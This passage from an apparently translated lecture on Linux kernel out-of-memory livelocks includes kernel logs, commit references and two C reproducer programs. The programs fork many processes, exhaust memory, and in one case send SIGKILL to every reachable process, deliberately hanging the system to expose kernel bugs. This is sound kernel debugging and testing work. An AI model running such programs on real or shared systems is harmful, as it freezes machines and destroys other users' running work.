[ 1950.495584]  [<ffffffffa020ad95>] xfs_read_agf+0x75/0xb0 [xfs]
[ 1950.499804]  [<ffffffffa020adf6>] xfs_alloc_read_agf+0x26/0xd0 [xfs]
[ 1950.504170]  [<ffffffffa020b1c5>] xfs_alloc_fix_freelist+0x325/0x3e0 [xfs]
[ 1950.508832]  [<ffffffffa0239752>] ? xfs_perag_get+0x82/0x110 [xfs]
[ 1950.513079]  [<ffffffff812dd76e>] ? __radix_tree_lookup+0x6e/0xd0
[ 1950.517235]  [<ffffffffa020b47e>] xfs_alloc_vextent+0x19e/0x480 [xfs]
[ 1950.521686]  [<ffffffffa02190cf>] xfs_bmap_btalloc+0x3bf/0x710 [xfs]
[ 1950.526006]  [<ffffffffa0219429>] xfs_bmap_alloc+0x9/0x10 [xfs]
[ 1950.530096]  [<ffffffffa0219e1a>] xfs_bmapi_write+0x47a/0xa10 [xfs]
[ 1950.534389]  [<ffffffffa024f3fd>] xfs_iomap_write_allocate+0x16d/0x350 [xfs]
[ 1950.539174]  [<ffffffffa023c4ed>] xfs_map_blocks+0x13d/0x150 [xfs]
[ 1950.543411]  [<ffffffffa023d468>] xfs_do_writepage+0x158/0x540 [xfs]
[ 1950.547712]  [<ffffffffa023d886>] xfs_vm_writepage+0x36/0x70 [xfs]
[ 1950.552184]  [<ffffffff8115e1df>] pageout.isra.43+0x18f/0x240
[ 1950.556493]  [<ffffffff8115fa85>] shrink_page_list+0x725/0x950
[ 1950.560540]  [<ffffffff811603a5>] shrink_inactive_list+0x205/0x490
[ 1950.564864]  [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740
[ 1950.569394]  [<ffffffff81161214>] shrink_zone+0xd4/0x2f0
[ 1950.573071]  [<ffffffff81162165>] kswapd+0x445/0x830
[ 1950.576627]  [<ffffffff81161d20>] ? mem_cgroup_shrink_node_zone+0xb0/0xb0
[ 1950.581585]  [<ffffffff81094d6e>] kthread+0xee/0x110
[ 1950.585080]  [<ffffffff8162796f>] ret_from_fork+0x1f/0x40
[ 1950.588837]  [<ffffffff81094c80>] ? kthread_create_on_node+0x230/0x230
(...snipped...)
[ 1964.314371] MemAlloc: kworker/2:1(4484) flags=0x4208860 switches=48311 seq=15 gfp=0x2400000(GFP_NOIO) order=0 delay=838842 uninterruptible
[ 1964.314373] kworker/2:1     D ffff88002d50b548     0  4484      2 0x00000080
[ 1964.314377] Workqueue: events_freezable_power_ disk_events_workfn
[ 1964.314378]  ffff88002d50b548 00000001001964d1 ffff88002a518100 ffff88002d5040c0
[ 1964.314379]  ffff88002d50c000 ffff88002d50b580 ffff88003d690300 00000001001964d1
[ 1964.314380]  0000000000000002 ffff88002d50b560 ffffffff81621dea ffff88003d690300
[ 1964.314380] Call Trace:
[ 1964.314382]  [<ffffffff81621dea>] schedule+0x3a/0x90
[ 1964.314383]  [<ffffffff8162667e>] schedule_timeout+0x11e/0x1c0
[ 1964.314384]  [<ffffffff810e4ba0>] ? init_timer_key+0x40/0x40
[ 1964.314385]  [<ffffffff8112f24a>] ? __delayacct_blkio_start+0x1a/0x30
[ 1964.314386]  [<ffffffff81621571>] io_schedule_timeout+0xa1/0x110
[ 1964.314387]  [<ffffffff8116ba5d>] congestion_wait+0x7d/0xd0
[ 1964.314389]  [<ffffffff810baaa0>] ? wait_woken+0x80/0x80
[ 1964.314390]  [<ffffffff811605e1>] shrink_inactive_list+0x441/0x490
[ 1964.314391]  [<ffffffff81174355>] ? __list_lru_count_one.isra.4+0x45/0x80
[ 1964.314392]  [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740
[ 1964.314393]  [<ffffffff81161214>] shrink_zone+0xd4/0x2f0
[ 1964.314394]  [<ffffffff811617aa>] do_try_to_free_pages+0x17a/0x400
[ 1964.314395]  [<ffffffff81161ac4>] try_to_free_pages+0x94/0xc0
[ 1964.314396]  [<ffffffff81153c1c>] __alloc_pages_nodemask+0x69c/0xf70
[ 1964.314397]  [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90
[ 1964.314400]  [<ffffffff811a6029>] ? kmem_cache_alloc_node+0x99/0x1d0
[ 1964.314402]  [<ffffffff8119e8c6>] alloc_pages_current+0x96/0x1b0
[ 1964.314404]  [<ffffffff812a3b2d>] ? bio_alloc_bioset+0x20d/0x2d0
[ 1964.314404]  [<ffffffff812a4f14>] bio_copy_kern+0xc4/0x180
[ 1964.314405]  [<ffffffff812aff00>] blk_rq_map_kern+0x70/0x130
[ 1964.314407]  [<ffffffff8140f2ad>] scsi_execute+0x12d/0x160
[ 1964.314408]  [<ffffffff8140f3d4>] scsi_execute_req_flags+0x84/0xf0
[ 1964.314412]  [<ffffffffa01e0762>] sr_check_events+0xb2/0x2a0 [sr_mod]
[ 1964.314414]  [<ffffffffa01d4163>] cdrom_check_events+0x13/0x30 [cdrom]
[ 1964.314415]  [<ffffffffa01e0ba5>] sr_block_check_events+0x25/0x30 [sr_mod]
[ 1964.314417]  [<ffffffff812bb6db>] disk_check_events+0x5b/0x150
[ 1964.314418]  [<ffffffff812bb7e7>] disk_events_workfn+0x17/0x20
[ 1964.314420]  [<ffffffff8108e2f5>] process_one_work+0x1a5/0x400
[ 1964.314421]  [<ffffffff8108e291>] ? process_one_work+0x141/0x400
[ 1964.314422]  [<ffffffff8108e676>] worker_thread+0x126/0x490
[ 1964.314424]  [<ffffffff8108e550>] ? process_one_work+0x400/0x400
[ 1964.314433]  [<ffffffff81094d6e>] kthread+0xee/0x110
[ 1964.314435]  [<ffffffff8162796f>] ret_from_fork+0x1f/0x40
[ 1964.314436]  [<ffffffff81094c80>] ? kthread_create_on_node+0x230/0x230
[ 1964.314503] Mem-Info:
[ 1964.314507] active_anon:197951 inactive_anon:2919 isolated_anon:0
[ 1964.314507]  active_file:585 inactive_file:1081 isolated_file:23
[ 1964.314507]  unevictable:0 dirty:0 writeback:204 unstable:0
[ 1964.314507]  slab_reclaimable:1715 slab_unreclaimable:10724
[ 1964.314507]  mapped:1114 shmem:3239 pagetables:5438 bounce:0
[ 1964.314507]  free:12237 free_pcp:73 free_cma:0
[ 1964.314512] Node 0 DMA free:4580kB min:732kB low:912kB high:1092kB active_anon:8600kB inactive_anon:0kB active_file:12kB inactive_file:20kB unevictable:0kB isolated(anon):0kB isolated(file):92kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:28kB mapped:12kB shmem:8kB slab_reclaimable:148kB slab_unreclaimable:716kB kernel_stack:368kB pagetables:524kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[ 1964.314514] lowmem_reserve[]: 0 936 936 936
[ 1964.314518] Node 0 DMA32 free:44368kB min:44320kB low:55400kB high:66480kB active_anon:783204kB inactive_anon:11676kB active_file:2328kB inactive_file:4304kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:1032064kB managed:981068kB mlocked:0kB dirty:0kB writeback:788kB mapped:4444kB shmem:12948kB slab_reclaimable:6712kB slab_unreclaimable:42180kB kernel_stack:19552kB pagetables:21228kB unstable:0kB bounce:0kB free_pcp:292kB local_pcp:36kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[ 1964.314519] lowmem_reserve[]: 0 0 0 0
[ 1964.314526] Node 0 DMA: 37*4kB (U) 30*8kB (UM) 18*16kB (UM) 10*32kB (U) 2*64kB (UM) 3*128kB (UM) 4*256kB (UM) 2*512kB (UM) 1*1024kB (U) 0*2048kB 0*4096kB = 4580kB
[ 1964.314530] Node 0 DMA32: 1384*4kB (UE) 1000*8kB (UE) 669*16kB (UME) 335*32kB (UME) 113*64kB (UME) 17*128kB (UME) 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 44368kB
[ 1964.314532] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB
[ 1964.314532] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[ 1964.314533] 4943 total pagecache pages
[ 1964.314534] 0 pages in swap cache
[ 1964.314535] Swap cache stats: add 0, delete 0, find 0/0
[ 1964.314535] Free swap  = 0kB
[ 1964.314536] Total swap = 0kB
[ 1964.314547] 262013 pages RAM
[ 1964.314547] 0 pages HighMem/MovableOnly
[ 1964.314548] 12770 pages reserved
[ 1964.314548] 0 pages cma reserved
[ 1964.314548] 0 pages hwpoisoned
[ 1964.314549] Showing busy workqueues and worker pools:
[ 1964.314572] workqueue events: flags=0x0
[ 1964.314617]   pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256
[ 1964.314634]     pending: vmw_fb_dirty_flush [vmwgfx]
[ 1964.314673] workqueue events_power_efficient: flags=0x80
[ 1964.314703]   pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256
[ 1964.314706]     in-flight: 1882:fb_flashcursor
[ 1964.314725] workqueue events_freezable_power_: flags=0x84
[ 1964.314744]   pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256
[ 1964.314748]     in-flight: 4484:disk_events_workfn
[ 1964.314794] workqueue writeback: flags=0x4e
[ 1964.314796]   pwq 128: cpus=0-63 flags=0x4 nice=0 active=2/256
[ 1964.314799]     in-flight: 73:wb_workfn wb_workfn
[ 1964.315291] workqueue xfs-eofblocks/sda1: flags=0xc
[ 1964.315314]   pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256
[ 1964.315322]     in-flight: 2125:xfs_eofblocks_worker [xfs]
[ 1964.315336] pool 4: cpus=2 node=0 flags=0x0 nice=0 hung=0s workers=4 idle: 2396
[ 1964.315395] pool 128: cpus=0-63 flags=0x4 nice=0 hung=0s workers=3 idle: 4706 6
(...snipped...)
[ 1964.320659] MemAlloc-Info: stalling=114 dying=3 exiting=3 victim=0 oom_count=3275
---------- Example output end ----------

The output above contains messages from the kmallocwd kernel thread. But since kmallocwd has not been accepted yet, the MemAlloc messages will not be printed when a system actually hits this situation. The only messages that can appear are the "blocked for more than 120 seconds" hung task reports, and only if both /proc/sys/kernel/hung_task_timeout_secs and /proc/sys/kernel/hung_task_warnings are set to non-zero values.

I have not received a response about this problem from Michal Hocko, because he is too busy with OOM killer / OOM reaper related fixes. I asked when we will be able to start handling this problem, but since this problem has deep roots, it is difficult to give an estimate.

March 2016  Memory depletion due to fs writeback operations under OOM situation

Allocation requests made in order to free memory are allowed to allocate from memory reserves. Therefore, not only threads with the TIF_MEMDIE flag set but also threads doing fs writeback operations can allocate from memory reserves. But since there is no means to limit the amount of memory allocated from memory reserves, allocating from them carelessly results in their depletion. As a result, when we examine behavior under OOM situations, we find that some behavior which causes no problem under normal situations makes things worse under OOM situations.

This is an example in which memory reserves are depleted by memory allocation requests for fs writeback operations, which are triggered via normal memory allocations, when an OOM livelock situation occurs while writing to a file.

---------- oom-tester16.c ----------
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/prctl.h>
#include <signal.h>

static char buffer[4096] = { };

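/* Thread body: keep appending 4KB blocks to a file until write() fails. */
static int file_io(void *unused)
{
        /* buffer holds the "file_io.NN" name set in main() and is also used as the data to write. */
        const int fd = open(buffer, O_WRONLY | O_CREAT | O_APPEND, 0600);
        sleep(2);
        while (write(fd, buffer, sizeof(buffer)) > 0);
        close(fd);
        return 0;
}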

int main(int argc, char *argv[])
{
        int i;
        if (chdir("/tmp"))
                return 1;
        for (i = 0; i < 64; i++)
                if (fork() == 0) {
                        static cpu_set_t set = { { 1 } };
                        const int fd = open("/proc/self/oom_score_adj", O_WRONLY);
                        write(fd, "1000", 4);
                        close(fd);
                        sched_setaffinity(0, sizeof(set), &set);
                        snprintf(buffer, sizeof(buffer), "file_io.%02u", i);
                        prctl(PR_SET_NAME, (unsigned long) buffer, 0, 0, 0);
                        for (i = 0; i < 16; i++)
                                clone(file_io, (char *) malloc(1024) + 1024, CLONE_VM, NULL);
                        while (1)
                                pause();
                }
        { /* A dummy process for invoking the OOM killer. */
                char *buf = NULL;
                unsigned long i;
                unsigned long size = 0;
                prctl(PR_SET_NAME, (unsigned long) "memeater", 0, 0, 0);
                for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
                        char *cp = realloc(buf, size);
                        if (!cp) {
                                size >>= 1;
                                break;
                        }
                        buf = cp;
                }
                sleep(4);
                for (i = 0; i < size; i += 4096)
                        buf[i] = '\0'; /* Will cause OOM due to overcommit */
        }
        kill(-1, SIGKILL);
        return * (char *) NULL; /* Not reached. */
}
---------- oom-tester16.c ----------
---------- Example output start ----------
[   59.562581] Mem-Info:
[   59.563935] active_anon:289393 inactive_anon:2093 isolated_anon:29
[   59.563935]  active_file:10838 inactive_file:113013 isolated_file:859
[   59.563935]  unevictable:0 dirty:108531 writeback:5308 unstable:0
[   59.563935]  slab_reclaimable:5526 slab_unreclaimable:7077
[   59.563935]  mapped:9970 shmem:2159 pagetables:2387 bounce:0
[   59.563935]  free:3042 free_pcp:0 free_cma:0
[   59.574558] Node 0 DMA free:6968kB min:44kB low:52kB high:64kB active_anon:6056kB inactive_anon:176kB active_file:712kB inactive_file:744kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:756kB writeback:0kB mapped:736kB shmem:184kB slab_reclaimable:48kB slab_unreclaimable:208kB kernel_stack:160kB pagetables:144kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:9708 all_unreclaimable? yes
[   59.585464] lowmem_reserve[]: 0 1732 1732 1732
[   59.587123] Node 0 DMA32 free:5200kB min:5200kB low:6500kB high:7800kB active_anon:1151516kB inactive_anon:8196kB active_file:42640kB inactive_file:451076kB unevictable:0kB isolated(anon):116kB isolated(file):3564kB present:2080640kB managed:1775332kB mlocked:0kB dirty:433368kB writeback:21232kB mapped:39144kB shmem:8452kB slab_reclaimable:22056kB slab_unreclaimable:28100kB kernel_stack:20976kB pagetables:9404kB unstable:0kB bounce:0kB free_pcp:120kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:2701604 all_unreclaimable? no
[   59.599649] lowmem_reserve[]: 0 0 0 0
[   59.601431] Node 0 DMA: 25*4kB (UME) 16*8kB (UME) 3*16kB (UE) 5*32kB (UME) 2*64kB (UM) 2*128kB (ME) 2*256kB (ME) 1*512kB (E) 1*1024kB (E) 2*2048kB (ME) 0*4096kB = 6964kB
[   59.606509] Node 0 DMA32: 925*4kB (UME) 140*8kB (UME) 5*16kB (ME) 5*32kB (M) 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 5060kB
[   59.610415] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB
[   59.612879] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   59.615308] 126847 total pagecache pages
[   59.616921] 0 pages in swap cache
[   59.618475] Swap cache stats: add 0, delete 0, find 0/0
[   59.620268] Free swap  = 0kB
[   59.621650] Total swap = 0kB
[   59.623011] 524157 pages RAM
[   59.624365] 0 pages HighMem/MovableOnly
[   59.625893] 76348 pages reserved
[   59.627506] 0 pages hwpoisoned
[   59.628838] Out of memory: Kill process 4450 (file_io.00) score 998 or sacrifice child
[   59.631071] Killed process 4450 (file_io.00) total-vm:4308kB, anon-rss:100kB, file-rss:1184kB, shmem-rss:0kB
[   61.526353] kthreadd: page allocation failure: order:0, mode:0x2200020
[   61.527976] file_io.00: page allocation failure: order:0, mode:0x2200020
[   61.527978] CPU: 0 PID: 4457 Comm: file_io.00 Not tainted 4.5.0-rc7+ #45
[   61.527979] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   61.527981]  0000000000000086 000000000005bb2d ffff88006cc5b588 ffffffff812a4d65
[   61.527982]  0000000002200020 0000000000000000 ffff88006cc5b618 ffffffff81106dc7
[   61.527983]  0000000000000000 ffffffffffffffff 00ff880000000000 ffff880000000004
[   61.527983] Call Trace:
[   61.528009]  [<ffffffff812a4d65>] dump_stack+0x4d/0x68
[   61.528012]  [<ffffffff81106dc7>] warn_alloc_failed+0xf7/0x150
[   61.528014]  [<ffffffff81109e3f>] __alloc_pages_nodemask+0x23f/0xa60
[   61.528016]  [<ffffffff81137770>] ? page_check_address_transhuge+0x350/0x350
[   61.528018]  [<ffffffff8111327d>] ? page_evictable+0xd/0x40
[   61.528019]  [<ffffffff8114d927>] alloc_pages_current+0x87/0x110
[   61.528021]  [<ffffffff81155181>] new_slab+0x3a1/0x440
[   61.528023]  [<ffffffff81156fdf>] ___slab_alloc+0x3cf/0x590
[   61.528024]  [<ffffffff811a0999>] ? wb_start_writeback+0x39/0x90
[   61.528027]  [<ffffffff815a7f68>] ? preempt_schedule_common+0x1f/0x37
[   61.528028]  [<ffffffff815a7f9f>] ? preempt_schedule+0x1f/0x30
[   61.528030]  [<ffffffff81001012>] ? ___preempt_schedule+0x12/0x14
[   61.528030]  [<ffffffff811a0999>] ? wb_start_writeback+0x39/0x90
[   61.528032]  [<ffffffff81175536>] __slab_alloc.isra.64+0x18/0x1d
[   61.528033]  [<ffffffff8115778c>] kmem_cache_alloc+0x11c/0x150
[   61.528034]  [<ffffffff811a0999>] wb_start_writeback+0x39/0x90
[   61.528035]  [<ffffffff811a0d9f>] wakeup_flusher_threads+0x7f/0xf0
[   61.528036]  [<ffffffff81115ac9>] do_try_to_free_pages+0x1f9/0x410
[   61.528037]  [<ffffffff81115d74>] try_to_free_pages+0x94/0xc0
[   61.528038]  [<ffffffff8110a166>] __alloc_pages_nodemask+0x566/0xa60
[   61.528040]  [<ffffffff81200878>] ? xfs_bmapi_read+0x208/0x2f0
[   61.528041]  [<ffffffff8114d927>] alloc_pages_current+0x87/0x110
[   61.528042]  [<ffffffff8110092f>] __page_cache_alloc+0xaf/0xc0
[   61.528043]  [<ffffffff811011e8>] pagecache_get_page+0x88/0x260
[   61.528044]  [<ffffffff81101d31>] grab_cache_page_write_begin+0x21/0x40
[   61.528046]  [<ffffffff81222c9f>] xfs_vm_write_begin+0x2f/0xf0
[   61.528047]  [<ffffffff810b14be>] ? current_fs_time+0x1e/0x30
[   61.528048]  [<ffffffff81101eca>] generic_perform_write+0xca/0x1c0
[   61.528050]  [<ffffffff8107c390>] ? wake_up_process+0x10/0x20
[   61.528051]  [<ffffffff8122e01c>] xfs_file_buffered_aio_write+0xcc/0x1f0
[   61.528052]  [<ffffffff81079037>] ? finish_task_switch+0x77/0x280
[   61.528053]  [<ffffffff8122e1c4>] xfs_file_write_iter+0x84/0x140
[   61.528054]  [<ffffffff811777a7>] __vfs_write+0xc7/0x100
[   61.528055]  [<ffffffff811784cd>] vfs_write+0x9d/0x190
[   61.528056]  [<ffffffff810010a1>] ? do_audit_syscall_entry+0x61/0x70
[   61.528057]  [<ffffffff811793c0>] SyS_write+0x50/0xc0
[   61.528059]  [<ffffffff815ab4d7>] entry_SYSCALL_64_fastpath+0x12/0x6a
[   61.528059] Mem-Info:
[   61.528062] active_anon:293335 inactive_anon:2093 isolated_anon:0
[   61.528062]  active_file:10829 inactive_file:110045 isolated_file:32
[   61.528062]  unevictable:0 dirty:109275 writeback:822 unstable:0
[   61.528062]  slab_reclaimable:5489 slab_unreclaimable:10070
[   61.528062]  mapped:9999 shmem:2159 pagetables:2420 bounce:0
[   61.528062]  free:3 free_pcp:0 free_cma:0
[   61.528065] Node 0 DMA free:12kB min:44kB low:52kB high:64kB active_anon:6060kB inactive_anon:176kB active_file:708kB inactive_file:756kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:756kB writeback:0kB mapped:736kB shmem:184kB slab_reclaimable:48kB slab_unreclaimable:7160kB kernel_stack:160kB pagetables:144kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:9844 all_unreclaimable? yes
[   61.528066] lowmem_reserve[]: 0 1732 1732 1732
[   61.528068] Node 0 DMA32 free:0kB min:5200kB low:6500kB high:7800kB active_anon:1167280kB inactive_anon:8196kB active_file:42608kB inactive_file:439424kB unevictable:0kB isolated(anon):0kB isolated(file):128kB present:2080640kB managed:1775332kB mlocked:0kB dirty:436344kB writeback:3288kB mapped:39260kB shmem:8452kB slab_reclaimable:21908kB slab_unreclaimable:33120kB kernel_stack:20976kB pagetables:9536kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:11073180 all_unreclaimable? yes
[   61.528069] lowmem_reserve[]: 0 0 0 0
[   61.528072] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   61.528074] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   61.528075] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB
[   61.528075] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   61.528076] 123086 total pagecache pages
[   61.528076] 0 pages in swap cache
[   61.528077] Swap cache stats: add 0, delete 0, find 0/0
[   61.528077] Free swap  = 0kB
[   61.528077] Total swap = 0kB
[   61.528077] 524157 pages RAM
[   61.528078] 0 pages HighMem/MovableOnly
[   61.528078] 76348 pages reserved
[   61.528078] 0 pages hwpoisoned
[   61.528079] SLUB: Unable to allocate memory on node -1 (gfp=0x2088020)
[   61.528080]   cache: kmalloc-64, object size: 64, buffer size: 64, default order: 0, min order: 0
[   61.528080]   node 0: slabs: 3218, objs: 205952, free: 0
[   61.528085] file_io.00: page allocation failure: order:0, mode:0x2200020
[   61.528086] CPU: 0 PID: 4457 Comm: file_io.00 Not tainted 4.5.0-rc7+ #45
---------- Example output end ----------

Although it is an interim fix, commit 78ebc2f7146156f4 ("mm,writeback: don't use memory reserves for wb_start_writeback") makes sure for now that this path does not deplete memory reserves.

It was lucky that this problem was found before the OOM reaper was accepted. If the OOM reaper had prevented the OOM livelock situation from occurring, we could not have reproduced this problem, and it would have been considered non-existent. For problems caused by the Linux kernel's memory management subsystem, the reporter is especially strongly expected to identify the culprit and hand it over by himself or herself, so we cannot expect unreproducible problems to be addressed.

May 2016  OOM livelock situation caused by a bug in down_write_killable()

down_write_killable() is a variant of down_write() that can be interrupted by the SIGKILL signal. It was introduced in order to reduce the possibility that the OOM reaper fails to reclaim memory, but it had a bug which resulted in an OOM livelock situation. Nobody noticed this bug for one month after the patch was accepted into linux-next, which was (at that time) the development version towards Linux 4.7-rc1. (Once again, the OOM situation is not tested well enough.)

---------- torture6.c ----------
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <sched.h>
#include <sys/prctl.h>
#include <sys/wait.h>

static int memory_eater(void *unused)
{
        char *buf = NULL;
        unsigned long size = 0;
        while (1) {
                char *tmp = realloc(buf, size + 4096);
                if (!tmp)
                        break;
                buf = tmp;
                buf[size] = 0;
                size += 4096;
                size %= 1048576;
        }
        kill(getpid(), SIGKILL);
        return 0;
}

static void child(void)
{
        char *stack = malloc(4096 * 2);
        char from[128] = { };
        char to[128] = { };
        const pid_t pid = getpid();
        unsigned char prev = 0;
        int fd = open("/proc/self/oom_score_adj", O_WRONLY);
        write(fd, "1000", 4);
        close(fd);
        snprintf(from, sizeof(from), "tgid=%u", pid);
        prctl(PR_SET_NAME, (unsigned long) from, 0, 0, 0);
        srand(pid);
        snprintf(from, sizeof(from), "file.%u-0", pid);
        fd = open(from, O_WRONLY | O_CREAT, 0600);
        if (fd == -1)
                _exit(1);
        if (clone(memory_eater, stack + 4096, CLONE_THREAD | CLONE_SIGHAND | CLONE_VM, NULL) == -1)
                _exit(1);
        while (1) {
                const unsigned char next = rand();
                snprintf(from, sizeof(from), "file.%u-%u", pid, prev);
                snprintf(to, sizeof(to), "file.%u-%u", pid, next);
                prev = next;
                rename(from, to);
                write(fd, "", 1);
        }
        _exit(0);
}

int main(int argc, char *argv[])
{
        if (chdir("/tmp"))
                return 1;
        if (fork() == 0) {
                char *buf = NULL;
                unsigned long size;
                unsigned long i;
                for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
                        char *cp = realloc(buf, size);
                        if (!cp) {
                                size >>= 1;
                                break;
                        }
                        buf = cp;
                }
                /* Will cause OOM due to overcommit */
                for (i = 0; i < size; i += 4096)
                        buf[i] = 0;
                while (1)
                        pause();
        } else {
                int children = 1024;
                while (1) {
                        while (children > 0) {
                                switch (fork()) {
                                case 0:
                                        child();
                                case -1:
                                        sleep(1);
                                        break;
                                default:
                                        children--;
                                }
                        }
                        wait(NULL);
                        children++;
                }
        }
        return 0;
}
---------- torture6.c ----------

This bug was fixed by commit 04cafed7fc19a801 ("locking/rwsem: Fix down_write_killable()").

July 2016  Memory depletion when performing swap out operation via dm-crypt

Since swapping out is considered an operation for freeing memory, allocation requests for performing swap out operations are allowed to allocate from memory reserves.

Linux 4.6 and later kernels include commit f9054c70d28bc214 ("mm, mempool: only set __GFP_NOMEMALLOC if there are free elements") in order to prevent threads with the TIF_MEMDIE flag set from being blocked forever inside mempool_alloc(). But this patch was not prepared for being called from memory reclaim operations. When dm-crypt is used for the swap device, dm-crypt allocates memory for encrypting the data that is about to be swapped out in order to free memory. As a result, the system became unresponsive due to depletion of memory reserves.

Since the OOM reaper was added in Linux 4.6, and currently we are trying to prove that the OOM livelock situation cannot occur as long as the OOM killer can be invoked, this patch was reverted by commit 4e390b2b2f34b8da ("Revert "mm, mempool: only set __GFP_NOMEMALLOC if there are free elements"").


Chapter 7   Closing: Suspect the MM subsystem when your Linux system hung up!?


The possibility of the system hanging up when the OOM killer can be invoked has been reduced. But the possibility of the system hanging up without the OOM killer being invoked still remains. Therefore, my conclusion from this experience is that the user's expectation that "the OOM killer is invoked in order to resolve the out of memory situation when the system runs out of memory" is currently an illusion.

Many years ago, after SELinux became enabled in enforcing mode by default, there was a tendency to "suspect SELinux when something goes wrong with an application's behavior".

When SELinux is the cause, we can check whether the problem goes away by disabling SELinux. But when the behavior of the memory management subsystem under out of memory is the cause, we cannot check whether the problem goes away by not using the memory management subsystem.

Since the behavior of the memory management subsystem under out of memory depends on system configuration/usage and timing, it is impossible to test all possibilities at the development stage. We need to get feedback when a problem occurs in the end user's environment. But since the memory management subsystem gives users no way to tell that "something unexpected is occurring" (in other words, there is no mechanism for proving that the memory management subsystem is innocent), users cannot even suspect the memory management subsystem, let alone provide feedback.

I'm sorry for system administrators and technical staff at support centers who are bothered by system hangups, but the situation of encountering unsolvable challenges in the CTF game will last for the time being.


7.1 Messages to audiences

Troubles are constantly reported to linux-mm mailing list.

It seems that the memory management subsystem in the Linux kernel is a mass of optimism and heuristics. Never swallow comments in the source code and/or change logs whole. Suspect, suspect and suspect. What are the preconditions? How bad a situation is the code prepared for? There is no shortage of things to suspect.

The "too small to fail" memory-allocation rule still exists. Also, there are "not too small" problems which cannot fail. In this lecture, you glimpsed the dark side of the Linux kernel's memory management. Why not take on these horribly difficult problems?

Let's overcome the barrier of divisions!

At the LSF/MM summit held this April, it seems that there was a discussion about an overhaul of GFP flags (which are the cause of these impossible-to-win games). Since I am neither a memory management developer nor a filesystem developer, I do not understand the details of the discussion (i.e. the behavior inside the respective subsystems). But it seems to me that the discussion is revealing how poorly knowledge is shared between the provider side and the user side. It is a pity that workarounds which can be backported to older kernels are completely ignored, but the Linux kernel developer community has started to take on the challenge.

In the real world, I feel that rigid organizations are increasingly failing to think about other divisions. Even within the same division, I feel that the "That is not my role!" attitude is spreading as an excuse for ducking issues. As if to add insult to injury, I feel that the trend towards forbidding, in the name of security, even sharing and thinking about problems as an organization is getting stronger.

I believe that, just as filesystem developers and memory management developers have started discussions for solving problems, we need to provide mental space for unconstrained communication in the real world. My view is that "thinking about various possibilities" (a bit of imagination and attentiveness) moves things forward, not for getting a favorable settlement in daily negotiations, but for solving long-standing problems.


7.2 References: Hints for obtaining information when your Linux system hung up

In virtualized environments, a memory dump is an alternative to kdump.

For Linux systems running as a guest in a virtualized environment (e.g. KVM or VMware), you can obtain a memory dump of the guest using the hypervisor's functionality. Since taking a memory dump does not involve a kernel panic, you can obtain multiple memory dumps and check how the situation changes over time. Therefore, when your Linux guest hangs up, you can increase the possibility of solving the problem by taking memory dumps of the guest several times before rebooting it.

Configure serial console and/or netconsole.

The Linux kernel does not print any messages when a hang up is caused by the behavior of the memory management subsystem. Therefore, you need to obtain information using e.g. memory dumps and/or SysRq.
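
While the system still accepts commands, SysRq can also be requested without a keyboard by writing a command character to /proc/sysrq-trigger. The following is a minimal sketch for practicing in advance; the function name sysrq_trigger is hypothetical, and root privilege is required. On a system that is already hung you will probably be unable to start a new program, so do not rely on this as the only method.

```c
#include <stdio.h>

/*
 * Write one SysRq command character (e.g. 'm' or 't') to the trigger file.
 * Pass "/proc/sysrq-trigger" as path on a real system.
 * Returns 0 on success, -1 on failure.
 */
static int sysrq_trigger(const char *path, char command)
{
        FILE *fp = fopen(path, "w");
        int ok;

        if (!fp)
                return -1;
        ok = fputc(command, fp) != EOF;
        if (fclose(fp))
                ok = 0;
        return ok ? 0 : -1;
}
```

For example, sysrq_trigger("/proc/sysrq-trigger", 'm') requests the same memory usage report as SysRq-m, and the result appears in the kernel log (and on the serial console or netconsole if configured).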

Check memory usage using SysRq-m.

